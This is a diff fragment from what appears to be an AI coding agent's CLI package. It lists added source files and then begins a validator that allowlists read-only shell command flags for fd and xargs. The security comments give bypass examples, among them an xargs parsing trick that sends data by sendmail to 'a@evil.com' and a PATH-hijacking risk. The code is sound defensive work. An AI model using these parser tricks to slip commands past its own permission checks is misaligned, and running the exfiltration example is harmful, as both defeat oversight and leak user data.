  1609. package/src/utils/computerUse/wrapper.js +317 -0
  1610. package/src/utils/concurrentSessions.js +179 -0
  1611. package/src/utils/config.js +1078 -0
  1612. package/src/utils/configConstants.js +18 -0
  1613. package/src/utils/contentArray.js +45 -0
  1614. package/src/utils/context.js +185 -0
  1615. package/src/utils/contextAnalysis.js +171 -0
  1616. package/src/utils/contextSuggestions.js +158 -0
  1617. package/src/utils/controlMessageCompat.js +31 -0
  1618. package/src/utils/conversationRecovery.js +434 -0
  1619. package/src/utils/cron.js +260 -0
  1620. package/src/utils/cronJitterConfig.js +62 -0
  1621. package/src/utils/cronScheduler.js +388 -0
  1622. package/src/utils/cronTasks.js +328 -0
  1623. package/src/utils/cronTasksLock.js +159 -0
  1624. package/src/utils/crossProjectResume.js +46 -0
  1625. package/src/utils/crypto.js +13 -0
  1626. package/src/utils/cwd.js +29 -0
  1627. package/src/utils/debug.js +220 -0
  1628. package/src/utils/debugFilter.js +125 -0
  1629. package/src/utils/deepLink/banner.js +103 -0
  1630. package/src/utils/deepLink/parseDeepLink.js +138 -0
  1631. package/src/utils/deepLink/protocolHandler.js +119 -0
  1632. package/src/utils/deepLink/registerProtocol.js +291 -0
  1633. package/src/utils/deepLink/terminalLauncher.js +455 -0
  1634. package/src/utils/deepLink/terminalPreference.js +51 -0
  1635. package/src/utils/desktopDeepLink.js +208 -0
  1636. package/src/utils/detectRepository.js +157 -0
  1637. package/src/utils/diagLogs.js +74 -0
  1638. package/src/utils/diff.js +108 -0
  1639. package/src/utils/directMemberMessage.js +34 -0
  1640. package/src/utils/displayTags.js +46 -0
  1641. package/src/utils/doctorContextWarnings.js +179 -0
  1642. package/src/utils/doctorDiagnostic.js +494 -0
  1643. package/src/utils/dxt/helpers.js +64 -0
  1644. package/src/utils/dxt/zip.js +167 -0
  1645. package/src/utils/earlyInput.js +166 -0
  1646. package/src/utils/editor.js +163 -0
  1647. package/src/utils/effort.js +271 -0
  1648. package/src/utils/embeddedTools.js +26 -0
  1649. package/src/utils/employeeChat.js +271 -0
  1650. package/src/utils/employeeDb.js +326 -0
  1651. package/src/utils/env.js +358 -0
  1652. package/src/utils/envDynamic.js +130 -0
  1653. package/src/utils/envUtils.js +161 -0
  1654. package/src/utils/envValidation.js +26 -0
  1655. package/src/utils/errorLogSink.js +196 -0
  1656. package/src/utils/errors.js +207 -0
  1657. package/src/utils/exampleCommands.js +165 -0
  1658. package/src/utils/execFileNoThrow.js +93 -0
  1659. package/src/utils/execFileNoThrowPortable.js +49 -0
  1660. package/src/utils/execSyncWrapper.js +6 -0
  1661. package/src/utils/exportRenderer.js +71 -0
  1662. package/src/utils/extraUsage.js +19 -0
  1663. package/src/utils/fastMode.js +393 -0
  1664. package/src/utils/file.js +467 -0
  1665. package/src/utils/fileHistory.js +851 -0
  1666. package/src/utils/fileOperationAnalytics.js +45 -0
  1667. package/src/utils/filePersistence/filePersistence.js +212 -0
  1668. package/src/utils/filePersistence/outputsScanner.js +104 -0
  1669. package/src/utils/filePersistence/types.js +4 -0
  1670. package/src/utils/fileRead.js +81 -0
  1671. package/src/utils/fileReadCache.js +78 -0
  1672. package/src/utils/fileStateCache.js +99 -0
  1673. package/src/utils/findExecutable.js +13 -0
  1674. package/src/utils/fingerprint.js +58 -0
  1675. package/src/utils/forkedAgent.js +410 -0
  1676. package/src/utils/format.js +238 -0
  1677. package/src/utils/formatBriefTimestamp.js +72 -0
  1678. package/src/utils/fpsTracker.js +34 -0
  1679. package/src/utils/frontmatterParser.js +260 -0
  1680. package/src/utils/fsOperations.js +555 -0
  1681. package/src/utils/fullscreen.js +194 -0
  1682. package/src/utils/generatedFiles.js +122 -0
  1683. package/src/utils/generators.js +67 -0
  1684. package/src/utils/genericProcessUtils.js +155 -0
  1685. package/src/utils/getWorktreePaths.js +56 -0
  1686. package/src/utils/getWorktreePathsPortable.js +23 -0
  1687. package/src/utils/ghPrStatus.js +71 -0
  1688. package/src/utils/git/gitConfigParser.js +226 -0
  1689. package/src/utils/git/gitFilesystem.js +606 -0
  1690. package/src/utils/git/gitignore.js +84 -0
  1691. package/src/utils/git.js +725 -0
  1692. package/src/utils/gitDiff.js +395 -0
  1693. package/src/utils/gitSettings.js +18 -0
  1694. package/src/utils/github/ghAuthStatus.js +23 -0
  1695. package/src/utils/githubRepoPathMapping.js +135 -0
  1696. package/src/utils/glob.js +90 -0
  1697. package/src/utils/gracefulShutdown.js +447 -0
  1698. package/src/utils/groupToolUses.js +126 -0
  1699. package/src/utils/handlePromptSubmit.js +398 -0
  1700. package/src/utils/hash.js +44 -0
  1701. package/src/utils/headlessProfiler.js +147 -0
  1702. package/src/utils/heapDumpService.js +201 -0
  1703. package/src/utils/heatmap.js +151 -0
  1704. package/src/utils/highlightMatch.js +29 -0
  1705. package/src/utils/hooks/AsyncHookRegistry.js +187 -0
  1706. package/src/utils/hooks/apiQueryHookHelper.js +77 -0
  1707. package/src/utils/hooks/execAgentHook.js +257 -0
  1708. package/src/utils/hooks/execHttpHook.js +184 -0
  1709. package/src/utils/hooks/execPromptHook.js +171 -0
  1710. package/src/utils/hooks/fileChangedWatcher.js +161 -0
  1711. package/src/utils/hooks/hookEvents.js +111 -0
  1712. package/src/utils/hooks/hookHelpers.js +60 -0
  1713. package/src/utils/hooks/hooksConfigManager.js +323 -0
  1714. package/src/utils/hooks/hooksConfigSnapshot.js +114 -0
  1715. package/src/utils/hooks/hooksSettings.js +204 -0
  1716. package/src/utils/hooks/postSamplingHooks.js +39 -0
  1717. package/src/utils/hooks/registerFrontmatterHooks.js +47 -0
  1718. package/src/utils/hooks/registerSkillHooks.js +40 -0
  1719. package/src/utils/hooks/sessionHooks.js +252 -0
  1720. package/src/utils/hooks/skillImprovement.js +211 -0
  1721. package/src/utils/hooks/ssrfGuard.js +258 -0
  1722. package/src/utils/hooks.js +3668 -0
  1723. package/src/utils/horizontalScroll.js +108 -0
  1724. package/src/utils/http.js +120 -0
  1725. package/src/utils/hyperlink.js +28 -0
  1726. package/src/utils/iTermBackup.js +48 -0
  1727. package/src/utils/ide.js +1195 -0
  1728. package/src/utils/idePathConversion.js +66 -0
  1729. package/src/utils/idleTimeout.js +44 -0
  1730. package/src/utils/imagePaste.js +343 -0
  1731. package/src/utils/imageResizer.js +664 -0
  1732. package/src/utils/imageStore.js +150 -0
  1733. package/src/utils/imageValidation.js +92 -0
  1734. package/src/utils/immediateCommand.js +12 -0
  1735. package/src/utils/inProcessTeammateHelpers.js +71 -0
  1736. package/src/utils/ink.js +20 -0
  1737. package/src/utils/intl.js +83 -0
  1738. package/src/utils/jetbrains.js +152 -0
  1739. package/src/utils/json.js +231 -0
  1740. package/src/utils/jsonRead.js +14 -0
  1741. package/src/utils/keyboardShortcuts.js +11 -0
  1742. package/src/utils/lazySchema.js +8 -0
  1743. package/src/utils/listSessionsImpl.js +332 -0
  1744. package/src/utils/localInstaller.js +130 -0
  1745. package/src/utils/lockfile.js +30 -0
  1746. package/src/utils/log.js +280 -0
  1747. package/src/utils/logoV2Utils.js +256 -0
  1748. package/src/utils/mailbox.js +50 -0
  1749. package/src/utils/managedEnv.js +160 -0
  1750. package/src/utils/managedEnvConstants.js +185 -0
  1751. package/src/utils/markdown.js +315 -0
  1752. package/src/utils/markdownConfigLoader.js +480 -0
  1753. package/src/utils/mcp/dateTimeParser.js +102 -0
  1754. package/src/utils/mcp/elicitationValidation.js +259 -0
  1755. package/src/utils/mcpInstructionsDelta.js +97 -0
  1756. package/src/utils/mcpOutputStorage.js +159 -0
  1757. package/src/utils/mcpValidation.js +165 -0
  1758. package/src/utils/mcpWebSocketTransport.js +180 -0
  1759. package/src/utils/memoize.js +205 -0
  1760. package/src/utils/memory/types.js +9 -0
  1761. package/src/utils/memory/versions.js +7 -0
  1762. package/src/utils/memoryFileDetection.js +245 -0
  1763. package/src/utils/messagePredicates.js +6 -0
  1764. package/src/utils/messageQueueManager.js +430 -0
  1765. package/src/utils/messages/mappers.js +240 -0
  1766. package/src/utils/messages/systemInit.js +72 -0
  1767. package/src/utils/messages.js +4286 -0
  1768. package/src/utils/model/agent.js +128 -0
  1769. package/src/utils/model/aliases.js +21 -0
  1770. package/src/utils/model/antModels.js +25 -0
  1771. package/src/utils/model/bedrock.js +220 -0
  1772. package/src/utils/model/check1mAccess.js +64 -0
  1773. package/src/utils/model/configs.js +86 -0
  1774. package/src/utils/model/contextWindowUpgradeCheck.js +41 -0
  1775. package/src/utils/model/deprecation.js +72 -0
  1776. package/src/utils/model/model.js +533 -0
  1777. package/src/utils/model/modelAllowlist.js +148 -0
  1778. package/src/utils/model/modelCapabilities.js +105 -0
  1779. package/src/utils/model/modelOptions.js +450 -0
  1780. package/src/utils/model/modelStrings.js +144 -0
  1781. package/src/utils/model/modelSupportOverrides.js +40 -0
  1782. package/src/utils/model/providers.js +35 -0
  1783. package/src/utils/model/validateModel.js +131 -0
  1784. package/src/utils/modelCost.js +160 -0
  1785. package/src/utils/modifiers.js +39 -0
  1786. package/src/utils/mtls.js +132 -0
  1787. package/src/utils/nativeInstaller/download.js +370 -0
  1788. package/src/utils/nativeInstaller/index.js +8 -0
  1789. package/src/utils/nativeInstaller/installer.js +1395 -0
  1790. package/src/utils/nativeInstaller/packageManagers.js +258 -0
  1791. package/src/utils/nativeInstaller/pidLock.js +347 -0
  1792. package/src/utils/notebook.js +176 -0
  1793. package/src/utils/objectGroupBy.js +15 -0
  1794. package/src/utils/pasteStore.js +93 -0
  1795. package/src/utils/path.js +140 -0
  1796. package/src/utils/pdf.js +236 -0
  1797. package/src/utils/pdfUtils.js +61 -0
  1798. package/src/utils/peerAddress.js +20 -0
  1799. package/src/utils/permissions/PermissionMode.js +95 -0
  1800. package/src/utils/permissions/PermissionPromptToolResultSchema.js +85 -0
  1801. package/src/utils/permissions/PermissionResult.js +11 -0
  1802. package/src/utils/permissions/PermissionRule.js +19 -0
  1803. package/src/utils/permissions/PermissionUpdate.js +268 -0
  1804. package/src/utils/permissions/PermissionUpdateSchema.js +61 -0
  1805. package/src/utils/permissions/autoModeState.js +31 -0
  1806. package/src/utils/permissions/bashClassifier.js +30 -0
  1807. package/src/utils/permissions/bypassPermissionsKillswitch.js +115 -0
  1808. package/src/utils/permissions/classifierDecision.js +86 -0
  1809. package/src/utils/permissions/classifierShared.js +28 -0
  1810. package/src/utils/permissions/dangerousPatterns.js +78 -0
  1811. package/src/utils/permissions/denialTracking.js +34 -0
  1812. package/src/utils/permissions/filesystem.js +1411 -0
  1813. package/src/utils/permissions/getNextPermissionMode.js +74 -0
  1814. package/src/utils/permissions/pathValidation.js +351 -0
  1815. package/src/utils/permissions/permissionExplainer.js +188 -0
  1816. package/src/utils/permissions/permissionRuleParser.js +175 -0
  1817. package/src/utils/permissions/permissionSetup.js +1162 -0
  1818. package/src/utils/permissions/permissions.js +1063 -0
  1819. package/src/utils/permissions/permissionsLoader.js +217 -0
  1820. package/src/utils/permissions/shadowedRuleDetection.js +149 -0
  1821. package/src/utils/permissions/shellRuleMatching.js +174 -0
  1822. package/src/utils/permissions/yoloClassifier.js +1193 -0
  1823. package/src/utils/planModeV2.js +75 -0
  1824. package/src/utils/plans.js +334 -0
  1825. package/src/utils/platform.js +122 -0
  1826. package/src/utils/plugins/addDirPluginSettings.js +53 -0
  1827. package/src/utils/plugins/cacheUtils.js +174 -0
  1828. package/src/utils/plugins/dependencyResolver.js +244 -0
  1829. package/src/utils/plugins/fetchTelemetry.js +108 -0
  1830. package/src/utils/plugins/gitAvailability.js +65 -0
  1831. package/src/utils/plugins/headlessPluginInstall.js +136 -0
  1832. package/src/utils/plugins/hintRecommendation.js +136 -0
  1833. package/src/utils/plugins/installCounts.js +221 -0
  1834. package/src/utils/plugins/installedPluginsManager.js +1003 -0
  1835. package/src/utils/plugins/loadPluginAgents.js +219 -0
  1836. package/src/utils/plugins/loadPluginCommands.js +595 -0
  1837. package/src/utils/plugins/loadPluginHooks.js +239 -0
  1838. package/src/utils/plugins/loadPluginOutputStyles.js +112 -0
  1839. package/src/utils/plugins/lspPluginIntegration.js +293 -0
  1840. package/src/utils/plugins/lspRecommendation.js +278 -0
  1841. package/src/utils/plugins/managedPlugins.js +26 -0
  1842. package/src/utils/plugins/marketplaceHelpers.js +470 -0
  1843. package/src/utils/plugins/marketplaceManager.js +1939 -0
  1844. package/src/utils/plugins/mcpPluginIntegration.js +465 -0
  1845. package/src/utils/plugins/mcpbHandler.js +708 -0
  1846. package/src/utils/plugins/officialMarketplace.js +19 -0
  1847. package/src/utils/plugins/officialMarketplaceGcs.js +202 -0
  1848. package/src/utils/plugins/officialMarketplaceStartupCheck.js +344 -0
  1849. package/src/utils/plugins/orphanedPluginFilter.js +96 -0
  1850. package/src/utils/plugins/parseMarketplaceInput.js +143 -0
  1851. package/src/utils/plugins/performStartupChecks.js +66 -0
  1852. package/src/utils/plugins/pluginAutoupdate.js +210 -0
  1853. package/src/utils/plugins/pluginBlocklist.js +93 -0
  1854. package/src/utils/plugins/pluginDirectories.js +170 -0
  1855. package/src/utils/plugins/pluginFlagging.js +173 -0
  1856. package/src/utils/plugins/pluginIdentifier.js +78 -0
  1857. package/src/utils/plugins/pluginInstallationHelpers.js +400 -0
  1858. package/src/utils/plugins/pluginLoader.js +2426 -0
  1859. package/src/utils/plugins/pluginOptionsStorage.js +311 -0
  1860. package/src/utils/plugins/pluginPolicy.js +18 -0
  1861. package/src/utils/plugins/pluginStartupCheck.js +261 -0
  1862. package/src/utils/plugins/pluginVersioning.js +128 -0
  1863. package/src/utils/plugins/reconciler.js +181 -0
  1864. package/src/utils/plugins/refresh.js +162 -0
  1865. package/src/utils/plugins/schemas.js +1283 -0
  1866. package/src/utils/plugins/validatePlugin.js +765 -0
  1867. package/src/utils/plugins/walkPluginMarkdown.js +49 -0
  1868. package/src/utils/plugins/zipCache.js +346 -0
  1869. package/src/utils/plugins/zipCacheAdapters.js +133 -0
  1870. package/src/utils/powershell/dangerousCmdlets.js +174 -0
  1871. package/src/utils/powershell/parser.js +1357 -0
  1872. package/src/utils/powershell/staticPrefix.js +277 -0
  1873. package/src/utils/preflightChecks.js +147 -0
  1874. package/src/utils/privacyLevel.js +49 -0
  1875. package/src/utils/process.js +56 -0
  1876. package/src/utils/processUserInput/processBashCommand.js +118 -0
  1877. package/src/utils/processUserInput/processSlashCommand.js +845 -0
  1878. package/src/utils/processUserInput/processTextPrompt.js +68 -0
  1879. package/src/utils/processUserInput/processUserInput.js +344 -0
  1880. package/src/utils/profilerBase.js +32 -0
  1881. package/src/utils/promptCategory.js +39 -0
  1882. package/src/utils/promptEditor.js +151 -0
  1883. package/src/utils/promptShellExecution.js +117 -0
  1884. package/src/utils/protectedNamespace.js +4 -0
  1885. package/src/utils/proxy.js +345 -0
  1886. package/src/utils/queryContext.js +110 -0
  1887. package/src/utils/queryHelpers.js +436 -0
  1888. package/src/utils/queryProfiler.js +242 -0
  1889. package/src/utils/queueProcessor.js +70 -0
  1890. package/src/utils/readEditContext.js +176 -0
  1891. package/src/utils/readFileInRange.js +278 -0
  1892. package/src/utils/releaseNotes.js +307 -0
  1893. package/src/utils/renderOptions.js +67 -0
  1894. package/src/utils/ripgrep.js +521 -0
  1895. package/src/utils/sandbox/sandbox-adapter.js +750 -0
  1896. package/src/utils/sandbox/sandbox-ui-utils.js +11 -0
  1897. package/src/utils/sanitization.js +72 -0
  1898. package/src/utils/screenshotClipboard.js +89 -0
  1899. package/src/utils/sdkEventQueue.js +49 -0
  1900. package/src/utils/secureStorage/fallbackStorage.js +59 -0
  1901. package/src/utils/secureStorage/index.js +13 -0
  1902. package/src/utils/secureStorage/keychainPrefetch.js +91 -0
  1903. package/src/utils/secureStorage/macOsKeychainHelpers.js +91 -0
  1904. package/src/utils/secureStorage/macOsKeychainStorage.js +192 -0
  1905. package/src/utils/secureStorage/plainTextStorage.js +81 -0
  1906. package/src/utils/semanticBoolean.js +23 -0
  1907. package/src/utils/semanticNumber.js +34 -0
  1908. package/src/utils/semver.js +51 -0
  1909. package/src/utils/sequential.js +43 -0
  1910. package/src/utils/sessionActivity.js +120 -0
  1911. package/src/utils/sessionEnvVars.js +18 -0
  1912. package/src/utils/sessionEnvironment.js +131 -0
  1913. package/src/utils/sessionFileAccessHooks.js +205 -0
  1914. package/src/utils/sessionIngressAuth.js +113 -0
  1915. package/src/utils/sessionRestore.js +357 -0
  1916. package/src/utils/sessionStart.js +165 -0
  1917. package/src/utils/sessionState.js +76 -0
  1918. package/src/utils/sessionStorage.js +4162 -0
  1919. package/src/utils/sessionStoragePortable.js +665 -0
  1920. package/src/utils/sessionTitle.js +120 -0
  1921. package/src/utils/sessionUrl.js +50 -0
  1922. package/src/utils/set.js +50 -0
  1923. package/src/utils/settings/allErrors.js +29 -0
  1924. package/src/utils/settings/applySettingsChange.js +65 -0
  1925. package/src/utils/settings/changeDetector.js +409 -0
  1926. package/src/utils/settings/constants.js +166 -0
  1927. package/src/utils/settings/internalWrites.js +33 -0
  1928. package/src/utils/settings/managedPath.js +29 -0
  1929. package/src/utils/settings/mdm/constants.js +62 -0
  1930. package/src/utils/settings/mdm/rawRead.js +97 -0
  1931. package/src/utils/settings/mdm/settings.js +254 -0
  1932. package/src/utils/settings/permissionValidation.js +224 -0
  1933. package/src/utils/settings/pluginOnlyPolicy.js +53 -0
  1934. package/src/utils/settings/schemaOutput.js +7 -0
  1935. package/src/utils/settings/settings.js +791 -0
  1936. package/src/utils/settings/settingsCache.js +47 -0
  1937. package/src/utils/settings/toolValidationConfig.js +76 -0
  1938. package/src/utils/settings/types.js +846 -0
  1939. package/src/utils/settings/validateEditTool.js +34 -0
  1940. package/src/utils/settings/validation.js +192 -0
  1941. package/src/utils/settings/validationTips.js +111 -0
  1942. package/src/utils/shell/bashProvider.js +202 -0
  1943. package/src/utils/shell/outputLimits.js +7 -0
  1944. package/src/utils/shell/powershellDetection.js +96 -0
  1945. package/src/utils/shell/powershellProvider.js +104 -0
  1946. package/src/utils/shell/prefix.js +246 -0
  1947. package/src/utils/shell/readOnlyCommandValidation.js +1776 -0
  1948. package/src/utils/shell/resolveDefaultShell.js +13 -0
  1949. package/src/utils/shell/shellProvider.js +2 -0
  1950. package/src/utils/shell/shellToolUtils.js +21 -0
  1951. package/src/utils/shell/specPrefix.js +198 -0
  1952. package/src/utils/shellConfig.js +136 -0
  1953. package/src/utils/sideQuery.js +134 -0
  1954. package/src/utils/sideQuestion.js +121 -0
  1955. package/src/utils/signal.js +34 -0
  1956. package/src/utils/sinks.js +15 -0
  1957. package/src/utils/skills/skillChangeDetector.js +264 -0
  1958. package/src/utils/slashCommandParsing.js +46 -0
  1959. package/src/utils/sleep.js +72 -0
  1960. package/src/utils/sliceAnsi.js +74 -0
  1961. package/src/utils/slowOperations.js +216 -0
  1962. package/src/utils/standaloneAgent.js +20 -0
  1963. package/src/utils/startupProfiler.js +149 -0
  1964. package/src/utils/staticRender.js +104 -0
  1965. package/src/utils/stats.js +802 -0
  1966. package/src/utils/statsCache.js +330 -0
  1967. package/src/utils/status.js +359 -0
  1968. package/src/utils/statusNoticeDefinitions.js +123 -0
  1969. package/src/utils/statusNoticeHelpers.js +15 -0
  1970. package/src/utils/stream.js +73 -0
  1971. package/src/utils/streamJsonStdoutGuard.js +107 -0
  1972. package/src/utils/streamlinedTransform.js +162 -0
  1973. package/src/utils/stringUtils.js +202 -0
  1974. package/src/utils/subprocessEnv.js +87 -0
  1975. package/src/utils/suggestions/commandSuggestions.js +458 -0
  1976. package/src/utils/suggestions/directoryCompletion.js +191 -0
  1977. package/src/utils/suggestions/shellHistoryCompletion.js +95 -0
  1978. package/src/utils/suggestions/skillUsageTracking.js +50 -0
  1979. package/src/utils/suggestions/slackChannelSuggestions.js +169 -0
  1980. package/src/utils/swarm/It2SetupPrompt.js +386 -0
  1981. package/src/utils/swarm/backends/ITermBackend.js +276 -0
  1982. package/src/utils/swarm/backends/InProcessBackend.js +237 -0
  1983. package/src/utils/swarm/backends/PaneBackendExecutor.js +250 -0
  1984. package/src/utils/swarm/backends/TmuxBackend.js +574 -0
  1985. package/src/utils/swarm/backends/detection.js +112 -0
  1986. package/src/utils/swarm/backends/it2Setup.js +185 -0
  1987. package/src/utils/swarm/backends/registry.js +369 -0
  1988. package/src/utils/swarm/backends/teammateModeSnapshot.js +68 -0
  1989. package/src/utils/swarm/backends/types.js +9 -0
  1990. package/src/utils/swarm/constants.js +29 -0
  1991. package/src/utils/swarm/inProcessRunner.js +1021 -0
  1992. package/src/utils/swarm/leaderPermissionBridge.js +31 -0
  1993. package/src/utils/swarm/permissionSync.js +667 -0
  1994. package/src/utils/swarm/reconnection.js +82 -0
  1995. package/src/utils/swarm/spawnInProcess.js +218 -0
  1996. package/src/utils/swarm/spawnUtils.js +123 -0
  1997. package/src/utils/swarm/teamHelpers.js +484 -0
  1998. package/src/utils/swarm/teammateInit.js +87 -0
  1999. package/src/utils/swarm/teammateLayoutManager.js +82 -0
  2000. package/src/utils/swarm/teammateModel.js +9 -0
  2001. package/src/utils/swarm/teammatePromptAddendum.js +17 -0
  2002. package/src/utils/systemDirectories.js +51 -0
  2003. package/src/utils/systemPrompt.js +88 -0
  2004. package/src/utils/systemPromptType.js +9 -0
  2005. package/src/utils/systemTheme.js +108 -0
  2006. package/src/utils/taggedId.js +49 -0
  2007. package/src/utils/task/TaskOutput.js +320 -0
  2008. package/src/utils/task/diskOutput.js +387 -0
  2009. package/src/utils/task/framework.js +236 -0
  2010. package/src/utils/task/outputFormatting.js +24 -0
  2011. package/src/utils/task/sdkProgress.js +24 -0
  2012. package/src/utils/taskSummary.js +3 -0
  2013. package/src/utils/tasks.js +672 -0
  2014. package/src/utils/teamDiscovery.js +48 -0
  2015. package/src/utils/teamMemoryOps.js +67 -0
  2016. package/src/utils/teammate.js +237 -0
  2017. package/src/utils/teammateContext.js +56 -0
  2018. package/src/utils/teammateMailbox.js +793 -0
  2019. package/src/utils/telemetry/betaSessionTracing.js +25 -0
  2020. package/src/utils/telemetry/bigqueryExporter.js +17 -0
  2021. package/src/utils/telemetry/events.js +7 -0
  2022. package/src/utils/telemetry/instrumentation.js +16 -0
  2023. package/src/utils/telemetry/logger.js +25 -0
  2024. package/src/utils/telemetry/perfettoTracing.js +882 -0
  2025. package/src/utils/telemetry/pluginTelemetry.js +76 -0
  2026. package/src/utils/telemetry/sessionTracing.js +62 -0
  2027. package/src/utils/telemetry/skillLoadedEvent.js +4 -0
  2028. package/src/utils/telemetryAttributes.js +56 -0
  2029. package/src/utils/teleport/api.js +299 -0
  2030. package/src/utils/teleport/environmentSelection.js +55 -0
  2031. package/src/utils/teleport/environments.js +84 -0
  2032. package/src/utils/teleport/gitBundle.js +192 -0
  2033. package/src/utils/teleport.js +1047 -0
  2034. package/src/utils/tempfile.js +26 -0
  2035. package/src/utils/terminal.js +105 -0
  2036. package/src/utils/terminalPanel.js +155 -0
  2037. package/src/utils/textHighlighting.js +113 -0
  2038. package/src/utils/thaddeusHints.js +142 -0
  2039. package/src/utils/theme.js +525 -0
  2040. package/src/utils/thinking.js +130 -0
  2041. package/src/utils/timeouts.js +35 -0
  2042. package/src/utils/tmuxSocket.js +373 -0
  2043. package/src/utils/todo/types.js +9 -0
  2044. package/src/utils/tokenBudget.js +62 -0
  2045. package/src/utils/tokens.js +223 -0
  2046. package/src/utils/toolErrors.js +101 -0
  2047. package/src/utils/toolPool.js +61 -0
  2048. package/src/utils/toolResultStorage.js +768 -0
  2049. package/src/utils/toolSchemaCache.js +7 -0
  2050. package/src/utils/toolSearch.js +551 -0
  2051. package/src/utils/transcriptSearch.js +200 -0
  2052. package/src/utils/treeify.js +111 -0
  2053. package/src/utils/truncate.js +164 -0
  2054. package/src/utils/udsClient.js +5 -0
  2055. package/src/utils/udsMessaging.js +23 -0
  2056. package/src/utils/ultraplan/ccrSession.js +264 -0
  2057. package/src/utils/ultraplan/keyword.js +122 -0
  2058. package/src/utils/unaryLogging.js +16 -0
  2059. package/src/utils/undercover.js +89 -0
  2060. package/src/utils/user.js +137 -0
  2061. package/src/utils/userAgent.js +9 -0
  2062. package/src/utils/userPromptKeywords.js +21 -0
  2063. package/src/utils/uuid.js +22 -0
  2064. package/src/utils/warningHandler.js +97 -0
  2065. package/src/utils/which.js +75 -0
  2066. package/src/utils/windowsPaths.js +146 -0
  2067. package/src/utils/withResolvers.js +13 -0
  2068. package/src/utils/words.js +793 -0
  2069. package/src/utils/workforceIntent.js +192 -0
  2070. package/src/utils/workloadContext.js +42 -0
  2071. package/src/utils/worktree.js +1142 -0
  2072. package/src/utils/worktreeModeEnabled.js +11 -0
  2073. package/src/utils/xdg.js +52 -0
  2074. package/src/utils/xml.js +15 -0
  2075. package/src/utils/yaml.js +14 -0
  2076. package/src/utils/zodToJsonSchema.js +19 -0
  2077. package/src/vim/motions.js +73 -0
  2078. package/src/vim/operators.js +401 -0
  2079. package/src/vim/textObjects.js +153 -0
  2080. package/src/vim/transitions.js +340 -0
  2081. package/src/vim/types.js +93 -0
  2082. package/src/voice/voiceModeEnabled.js +20 -0
  2083. package/thaddeus-terminal.ts +401 -3
  2084. package/thaddeus.command +1 -1
@@ -0,0 +1,1794 @@
1
+ import { getOriginalCwd } from '../../bootstrap/state.js';
2
+ import { extractOutputRedirections, splitCommand_DEPRECATED, } from '../../utils/bash/commands.js';
3
+ import { tryParseShellCommand } from '../../utils/bash/shellQuote.js';
4
+ import { getCwd } from '../../utils/cwd.js';
5
+ import { isCurrentDirectoryBareGitRepo } from '../../utils/git.js';
6
+ import { getPlatform } from '../../utils/platform.js';
7
+ import { SandboxManager } from '../../utils/sandbox/sandbox-adapter.js';
8
+ import { containsVulnerableUncPath, DOCKER_READ_ONLY_COMMANDS, EXTERNAL_READONLY_COMMANDS, GH_READ_ONLY_COMMANDS, GIT_READ_ONLY_COMMANDS, PYRIGHT_READ_ONLY_COMMANDS, RIPGREP_READ_ONLY_COMMANDS, validateFlags, } from '../../utils/shell/readOnlyCommandValidation.js';
9
+ import { isNormalizedGitCommand } from './bashPermissions.js';
10
+ import { bashCommandIsSafe_DEPRECATED } from './bashSecurity.js';
11
+ import { COMMAND_OPERATION_TYPE, PATH_EXTRACTORS, } from './pathValidation.js';
12
+ import { sedCommandIsAllowedByAllowlist } from './sedValidation.js';
13
+ // Shared safe flags for fd and fdfind (Debian/Ubuntu package name)
14
+ // SECURITY: -x/--exec and -X/--exec-batch are deliberately excluded —
15
+ // they execute arbitrary commands for each search result.
16
+ const FD_SAFE_FLAGS = {
17
+ '-h': 'none',
18
+ '--help': 'none',
19
+ '-V': 'none',
20
+ '--version': 'none',
21
+ '-H': 'none',
22
+ '--hidden': 'none',
23
+ '-I': 'none',
24
+ '--no-ignore': 'none',
25
+ '--no-ignore-vcs': 'none',
26
+ '--no-ignore-parent': 'none',
27
+ '-s': 'none',
28
+ '--case-sensitive': 'none',
29
+ '-i': 'none',
30
+ '--ignore-case': 'none',
31
+ '-g': 'none',
32
+ '--glob': 'none',
33
+ '--regex': 'none',
34
+ '-F': 'none',
35
+ '--fixed-strings': 'none',
36
+ '-a': 'none',
37
+ '--absolute-path': 'none',
38
+ // SECURITY: -l/--list-details EXCLUDED — internally executes `ls` as subprocess (same
39
+ // pathway as --exec-batch). PATH hijacking risk if malicious `ls` is on PATH.
40
+ '-L': 'none',
41
+ '--follow': 'none',
42
+ '-p': 'none',
43
+ '--full-path': 'none',
44
+ '-0': 'none',
45
+ '--print0': 'none',
46
+ '-d': 'number',
47
+ '--max-depth': 'number',
48
+ '--min-depth': 'number',
49
+ '--exact-depth': 'number',
50
+ '-t': 'string',
51
+ '--type': 'string',
52
+ '-e': 'string',
53
+ '--extension': 'string',
54
+ '-S': 'string',
55
+ '--size': 'string',
56
+ '--changed-within': 'string',
57
+ '--changed-before': 'string',
58
+ '-o': 'string',
59
+ '--owner': 'string',
60
+ '-E': 'string',
61
+ '--exclude': 'string',
62
+ '--ignore-file': 'string',
63
+ '-c': 'string',
64
+ '--color': 'string',
65
+ '-j': 'number',
66
+ '--threads': 'number',
67
+ '--max-buffer-time': 'string',
68
+ '--max-results': 'number',
69
+ '-1': 'none',
70
+ '-q': 'none',
71
+ '--quiet': 'none',
72
+ '--show-errors': 'none',
73
+ '--strip-cwd-prefix': 'none',
74
+ '--one-file-system': 'none',
75
+ '--prune': 'none',
76
+ '--search-path': 'string',
77
+ '--base-directory': 'string',
78
+ '--path-separator': 'string',
79
+ '--batch-size': 'number',
80
+ '--no-require-git': 'none',
81
+ '--hyperlink': 'string',
82
+ '--and': 'string',
83
+ '--format': 'string',
84
+ };
85
+ // Central configuration for allowlist-based command validation
86
+ // All commands and flags here should only allow reading files. They should not
87
+ // allow writing to files, executing code, or creating network requests.
88
+ const COMMAND_ALLOWLIST = {
89
+ xargs: {
90
+ safeFlags: {
91
+ '-I': '{}',
92
+ // SECURITY: `-i` and `-e` (lowercase) REMOVED — both use GNU getopt
93
+ // optional-attached-arg semantics (`i::`, `e::`). The arg MUST be
94
+ // attached (`-iX`, `-eX`); space-separated (`-i X`, `-e X`) means the
95
+ // flag takes NO arg and `X` becomes the next positional (target command).
96
+ //
97
+ // `-i` (`i::` — optional replace-str):
98
+ // echo /usr/sbin/sendm | xargs -it tail a@evil.com
99
+ // validator: -it bundle (both 'none') OK, tail ∈ SAFE_TARGET → break
100
+ // GNU: -i replace-str=t, tail → /usr/sbin/sendmail → NETWORK EXFIL
101
+ //
102
+ // `-e` (`e::` — optional eof-str):
103
+ // cat data | xargs -e EOF echo foo
104
+ // validator: -e consumes 'EOF' as arg (type 'EOF'), echo ∈ SAFE_TARGET
105
+ // GNU: -e no attached arg → no eof-str, 'EOF' is the TARGET COMMAND
106
